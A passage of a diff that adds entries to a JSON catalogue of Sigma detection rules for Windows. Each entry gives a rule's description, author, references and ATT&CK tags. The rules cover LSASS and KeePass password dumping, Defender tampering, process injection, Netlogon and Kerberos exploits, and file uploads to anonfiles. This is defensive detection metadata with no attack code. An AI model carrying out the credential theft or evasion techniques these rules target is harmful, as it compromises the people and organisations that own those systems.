"f512acbf-e662-4903-843e-97ce4652b740", + "value": "Volume Shadow Copy Mount" + }, + { + "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", + "meta": { + "author": "NVISO", + "creation_date": "2020/09/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_vul_cve_2020_1472.yml", + "level": "high", + "logsource.category": "No established category", + 
"logsource.product": "windows", + "refs": [ + "https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_vul_cve_2020_1472.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ] + }, + "uuid": "a0cb7110-edf0-47a4-9177-541a4083128a", + "value": "Vulnerable Netlogon Secure Channel Connection Allowed" + }, + { + "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_vul_cve_2021_42278_or_cve_2021_42287.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_vul_cve_2021_42278_or_cve_2021_42287.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ] + }, + "uuid": "44bbff3e-4ca3-452d-a49a-6efa4cafa06f", + "value": "Exploit SamAccountName Spoofing with Kerberos" + }, + { + "description": "This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. 
The aggregation and count function selects tasks with rare names.", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/17", + "falsepositive": [ + "Software installation" + ], + "filename": "win_rare_schtask_creation.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_rare_schtask_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.s0111", + "attack.t1053.005" + ] + }, + "uuid": "b20f6158-9438-41be-83da-a5a16ac90c2b", + "value": "Rare Scheduled Task Creations" + }, + { + "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/05", + "falsepositive": [ + "Unknown" + ], + "filename": "win_task_scheduler_susp_task_locations.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_task_scheduler_susp_task_locations.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.005" + ] + }, + "uuid": "424273ea-7cf8-43a6-b712-375f925e481f", + "value": "Suspicious Scheduled Tasks Locations" + }, + { + "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/29", + "falsepositive": [ + "Unknown" + ], + "filename": "win_terminalservices_rdp_ngrok.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", + 
"https://ngrok.com/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "64d51a51-32a6-49f0-9f3d-17e34d640272", + "value": "Ngrok Usage with Remote Desktop Service" + }, + { + "description": "Detects Access to LSASS Process", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/08/26", + "falsepositive": [ + "Google Chrome GoogleUpdate.exe", + "Some Taskmgr.exe related activity" + ], + "filename": "win_defender_alert_lsass_access.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard?WT.mc_id=twitter", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_alert_lsass_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", + "value": "LSASS Access Detected via Attack Surface Reduction" + }, + { + "description": "Detects triggering of AMSI by Windows Defender.", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2020/09/14", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_defender_amsi_trigger.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_amsi_trigger.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", + "value": "Windows Defender AMSI Trigger Detected" + }, + { + "description": "Detects disabling Windows Defender threat protection", + "meta": { + "author": 
"Ján Trenčanský, frack113", + "creation_date": "2020/07/28", + "falsepositive": [ + "Administrator actions" + ], + "filename": "win_defender_disabled.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", + "value": "Windows Defender Threat Detection Disabled" + }, + { + "description": "Detects the Setting of Windows Defender Exclusions", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/07/06", + "falsepositive": [ + "Administrator actions" + ], + "filename": "win_defender_exclusions.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/_nullbind/status/1204923340810543109", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_exclusions.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f", + "value": "Windows Defender Exclusions Added" + }, + { + "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_defender_exploit_guard_tamper.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": 
[ + "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_exploit_guard_tamper.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "a3ab73f1-bd46-4319-8f06-4b20d0617886", + "value": "Windows Defender Exploit Guard Tamper" + }, + { + "description": "Windows Defender logs when the history of detected infections is deleted. Log file will contain the message \"Windows Defender Antivirus has removed history of malware and other potentially unwanted software\".", + "meta": { + "author": "Cian Heasley", + "creation_date": "2020/08/13", + "falsepositive": [ + "Deletion of Defender malware detections history for legitimate reasons" + ], + "filename": "win_defender_history_delete.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/troubleshoot-microsoft-defender-antivirus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_history_delete.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001" + ] + }, + "uuid": "2afe6582-e149-11ea-87d0-0242ac130003", + "value": "Windows Defender Malware Detection History Deletion" + }, + { + "description": "Detects blocking of process creations originating from PSExec and WMI commands", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2020/07/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_defender_psexec_wmi_asr.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + 
"https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction?WT.mc_id=twitter#block-process-creations-originating-from-psexec-and-wmi-commands", + "https://twitter.com/duff22b/status/1280166329660497920", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_psexec_wmi_asr.yml" + ], + "tags": [ + "attack.execution", + "attack.lateral_movement", + "attack.t1047", + "attack.t1569.002" + ] + }, + "uuid": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", + "value": "PSExec and WMI Process Creations Block" + }, + { + "description": "Detects block of attempt to disable real time protection of Microsoft Defender by tamper protection", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/07/05", + "falsepositive": [ + "Administrator actions" + ], + "filename": "win_defender_tamper_protection_trigger.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_tamper_protection_trigger.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "49e5bc24-8b86-49f1-b743-535f332c2856", + "value": "Microsoft Defender Tamper Protection Trigger" + }, + { + "description": "Detects all actions taken by Windows Defender malware detection engines", + "meta": { + "author": "Ján Trenčanský", + "creation_date": "2020/07/28", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_defender_threat.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_threat.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "57b649ef-ff42-4fb0-8bf6-62da243a1708", + "value": "Windows Defender Threat Detected" + }, + { + "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", + "meta": { + "author": "Florian Roth, Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", + "creation_date": "2017/08/22", + "falsepositive": [ + "Unknown (data set is too small; further testing needed)" + ], + "filename": "win_wmi_persistence.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mattifestation/status/899646620148539397", + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/wmi/win_wmi_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" + ] + }, + "uuid": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", + "value": "WMI Persistence" + }, + { + "description": "Detects remote thread injection events based on action seen used by bumblebee", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "create_remote_thread_win_bumblebee.yml", + "level": "high", + "logsource.category": "create_remote_thread", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_bumblebee.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" + ] + }, + "uuid": "994cac2b-92c2-44bf-8853-14f6ca39fbda", + "value": "Bumblebee Remote Thread Creation" + }, + { + "description": 
"Detects remote thread creation from CACTUSTORCH as described in references.", + "meta": { + "author": "@SBousseaden (detection), Thomas Patzke (rule)", + "creation_date": "2019/02/01", + "falsepositive": [ + "Unknown" + ], + "filename": "create_remote_thread_win_cactustorch.yml", + "level": "high", + "logsource.category": "create_remote_thread", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1090588499517079552", + "https://github.com/mdsecactivebreach/CACTUSTORCH", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cactustorch.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055.012", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218.005" + ] + }, + "uuid": "2e4e488a-6164-4811-9ea1-f960c7359c40", + "value": "CACTUSTORCH Remote Thread Creation" + }, + { + "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", + "meta": { + "author": "Olaf Hartong, Florian Roth, Aleksey Potapov, oscd.community", + "creation_date": "2018/11/30", + "falsepositive": [ + "Unknown" + ], + "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml", + "level": "high", + "logsource.category": "create_remote_thread", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f", + "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cobaltstrike_process_injection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055.001" + ] + }, + "uuid": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", + "value": "CobaltStrike Process Injection" + }, + { + "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject 
DLL into a process", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/11", + "falsepositive": [ + "Unknown" + ], + "filename": "create_remote_thread_win_loadlibrary.yml", + "level": "high", + "logsource.category": "create_remote_thread", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-180719170510.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_loadlibrary.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055.001" + ] + }, + "uuid": "052ec6f6-1adc-41e6-907a-f1c813478bee", + "value": "CreateRemoteThread API and LoadLibrary" + }, + { + "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", + "meta": { + "author": "Timon Hackenjos", + "creation_date": "2022/04/22", + "falsepositive": [ + "Unknown" + ], + "filename": "create_remote_thread_win_password_dumper_keepass.yml", + "level": "high", + "logsource.category": "create_remote_thread", + "logsource.product": "windows", + "refs": [ + "https://www.cisa.gov/uscert/ncas/alerts/aa20-259a", + "https://github.com/denandz/KeeFarce", + "https://github.com/GhostPack/KeeThief", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_password_dumper_keepass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.005" + ] + }, + "uuid": "77564cc2-7382-438b-a7f6-395c2ae53b9a", + "value": "KeePass Password Dumping" + }, + { + "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. 
A single execution can lead to hundreds of events.\n", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/02/19", + "falsepositive": [ + "Antivirus products" + ], + "filename": "create_remote_thread_win_password_dumper_lsass.yml", + "level": "high", + "logsource.category": "create_remote_thread", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_password_dumper_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.s0005", + "attack.t1003.001" + ] + }, + "uuid": "f239b326-2f41-4d6b-9dfa-c846a60ef505", + "value": "Password Dumper Remote Thread in LSASS" + }, + { + "description": "Detects the creation of a remote thread from a Powershell process to another process", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unknown" + ], + "filename": "create_remote_thread_win_powershell_code_injection.yml", + "level": "high", + "logsource.category": "create_remote_thread", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_powershell_code_injection.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", + "value": "Accessing WinAPI in PowerShell. 
Code Injection" + }, + { + "description": "Detects PowerShell remote thread creation in Rundll32.exe", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/06/25", + "falsepositive": [ + "Unknown" + ], + "filename": "create_remote_thread_win_susp_powershell_rundll32.yml", + "level": "high", + "logsource.category": "create_remote_thread", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_powershell_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" + ] + }, + "uuid": "99b97608-3e21-4bfe-8217-2a127c396a0e", + "value": "PowerShell Rundll32 Remote Thread Creation" + }, + { + "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like word.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "meta": { + "author": "Perez Diego (@darkquassar), oscd.community", + "creation_date": "2019/10/27", + "falsepositive": [ + "Unknown" + ], + "filename": "create_remote_thread_win_susp_remote_thread_source.yml", + "level": "high", + "logsource.category": "create_remote_thread", + "logsource.product": "windows", + "refs": [ + "Personal research, statistical analysis", + "https://lolbas-project.github.io", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_remote_thread_source.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1055" + ] + }, + "uuid": 
"66d31e5f-52d6-40a4-9615-002d3789a119", + "value": "Suspicious Remote Thread Source" + }, + { + "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like word.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/25", + "falsepositive": [ + "Unknown" + ], + "filename": "create_remote_thread_win_susp_remote_thread_target.yml", + "level": "medium", + "logsource.category": "create_remote_thread", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_remote_thread_target.yml" + ], + "tags": "No established tags" + }, + "uuid": "f016c716-754a-467f-a39e-63c06f773987", + "value": "Suspicious Remote Thread Target" + }, + { + "description": "Detects a remote thread creation in suspicious target images", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/16", + "falsepositive": [ + "Unknown" + ], + "filename": "create_remote_thread_win_susp_targets.yml", + "level": "high", + "logsource.category": "create_remote_thread", + "logsource.product": "windows", + "refs": [ + "https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_targets.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.003" + ] + }, + "uuid": "a1a144b7-5c9b-4853-a559-2172be8d4a03", + "value": "Remote 
Thread Creation in Suspicious Targets" + }, + { + "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", + "meta": { + "author": "frack113", + "creation_date": "2022/05/16", + "falsepositive": [ + "Unknown" + ], + "filename": "create_remote_thread_win_ttdinjec.yml", + "level": "high", + "logsource.category": "create_remote_thread", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", + "value": "Remote Thread Creation Ttdinject.exe Proxy" + }, + { + "description": "Detects the creation of an ADS data stream that contains an executable (non-empty imphash)", + "meta": { + "author": "Florian Roth, @0xrawsec", + "creation_date": "2018/06/03", + "falsepositive": [ + "Unknown" + ], + "filename": "create_stream_hash_ads_executable.yml", + "level": "medium", + "logsource.category": "create_stream_hash", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0xrawsec/status/1002478725605273600?s=21", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_ads_executable.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" + ] + }, + "uuid": "b69888d4-380c-45ce-9cf9-d9ce46e67821", + "value": "Executable in ADS" + }, + { + "description": "Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers", + "meta": { + "author": "frack113", + "creation_date": "2022/10/22", + "falsepositive": [ + "Other legitimate browsers not currently included in the filter (please add them)", + "Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)" + ], + "filename": 
"create_stream_hash_creation_internet_file.yml", + "level": "medium", + "logsource.category": "create_stream_hash", + "logsource.product": "windows", + "refs": [ + "https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_creation_internet_file.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "573df571-a223-43bc-846e-3f98da481eca", + "value": "Creation Of a Suspicious ADS File Outside a Browser Download" + }, + { + "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "create_stream_hash_hacktool_download.yml", + "level": "high", + "logsource.category": "create_stream_hash", + "logsource.product": "windows", + "refs": [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" + ] + }, + "uuid": "19b041f6-e583-40dc-b842-d6fa8011493f", + "value": "Hacktool Download" + }, + { + "description": "Exports the target Registry key and hides it in the specified alternate data stream.", + "meta": { + "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "Unknown" + ], + "filename": "create_stream_hash_regedit_export_to_ads.yml", + "level": "high", + "logsource.category": "create_stream_hash", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", + "value": "Exports Registry Key To an Alternate Data Stream" + }, + { + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "create_stream_hash_susp_domain_ext_combo.yml", + "level": "high", + "logsource.category": "create_stream_hash", + "logsource.product": "windows", + "refs": [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" + ] + }, + "uuid": "52182dfb-afb7-41db-b4bc-5336cb29b464", + "value": "Suspicious File Download from File Sharing Domain" + }, + { + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "create_stream_hash_susp_domain_ext_combo_med.yml", + "level": "medium", + "logsource.category": "create_stream_hash", + "logsource.product": "windows", + "refs": [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo_med.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" + ] + }, + "uuid": 
"ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", + "value": "Unusual File Download from File Sharing Domain" + }, + { + "description": "Detects the download of suspicious file type from URLs with IP", + "meta": { + "author": "Nasreddine Bencherchali, Florian Roth", + "creation_date": "2022/09/07", + "falsepositive": [ + "Unknown" + ], + "filename": "create_stream_hash_susp_ip_domains.yml", + "level": "high", + "logsource.category": "create_stream_hash", + "logsource.product": "windows", + "refs": [ + "https://github.com/trustedsec/SysmonCommunityGuide/blob/adcdfee20999f422b974c8d4149bf4c361237db7/chapters/file-stream-creation-hash.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "value": "Unusual File Download from Direct IP Address" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/07/11", + "falsepositive": [ + "FP may be caused in legitimate usage of the softwares mentioned above" + ], + "filename": "dns_query_remote_access_software_domains.yml", + "level": "medium", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution", + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_remote_access_software_domains.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", + "value": "Query To Remote Access Software Domain" + }, + { + "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", + "meta": { + "author": "pH-T", + "creation_date": "2022/07/15", + "falsepositive": [ + "Legitimate access to anonfiles.com" + ], + "filename": "dns_query_win_anonymfiles_com.yml", + "level": "high", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_anonymfiles_com.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ] + }, + "uuid": 
"065cceea-77ec-4030-9052-fc0affea7110", + "value": "DNS Query for Anonfiles.com Domain" + }, + { + "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2021/04/12", + "falsepositive": [ + "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" + ], + "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml", + "level": "high", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_hybridconnectionmgr_servicebus.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1554" + ] + }, + "uuid": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", + "value": "DNS HybridConnectionManager Service Bus" + }, + { + "description": "AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL", + "meta": { + "author": "frack113", + "creation_date": "2021/11/24", + "falsepositive": [ + "Unknown" + ], + "filename": "dns_query_win_lobas_appinstaller.yml", + "level": "medium", + 